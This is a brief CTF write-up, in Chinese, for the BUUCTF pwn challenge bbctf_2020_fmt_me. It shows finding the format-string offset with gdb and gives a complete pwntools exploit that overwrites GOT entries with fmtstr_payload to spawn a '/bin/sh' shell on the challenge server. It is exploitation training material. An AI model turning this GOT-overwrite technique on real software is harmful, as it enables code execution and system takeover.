BUUCTF-PWN-bbctf_2020_fmt_me

checksec

image-20220222224245086

IDA

image-20220222224339867

偏移计算

使用gdb调试,先对system函数下断点,然后如下图输入:

image-20220222224611656

由于snprintf并没有将buf中的内容打印到标准输出,而是在other_buf中,所以我们需要在gdb中查看内存情况:

使用x/5s 0x4040a0命令,0x4040a0other_buf的地址

image-20220222224929733

得到偏移为6

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *

p = remote('node4.buuoj.cn', 28695)
elf = ELF('./fm')

# context.log_level = 'debug'
context.arch = 'amd64'

fmt1 = fmtstr_payload(6, {elf.got['system']: elf.sym['main']}, write_size='long')
p.sendlineafter('Choice: ', '2')
p.sendlineafter('Good job. I\'ll give you a gift.', fmt1)

fmt2 = b'/bin/sh;'
fmt2 += fmtstr_payload(7, {elf.got['snprintf']: 0x401056-8}, write_size='long')

p.sendlineafter('Choice: ','2')
p.sendlineafter('Good job. I\'ll give you a gift.', fmt2)
p.sendlineafter('Choice: ', '2')
p.sendlineafter('Good job. I\'ll give you a gift.', 'aaaaaaaa')

p.interactive()

结果

image-20220222225144434